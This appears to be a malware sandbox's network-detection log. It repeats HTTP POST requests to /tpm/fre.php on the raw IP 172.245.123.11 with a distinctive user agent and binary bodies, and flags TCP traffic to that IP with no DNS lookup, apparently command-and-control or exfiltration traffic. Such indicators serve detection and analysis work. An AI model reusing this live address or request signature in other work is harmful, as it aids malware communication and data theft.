Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
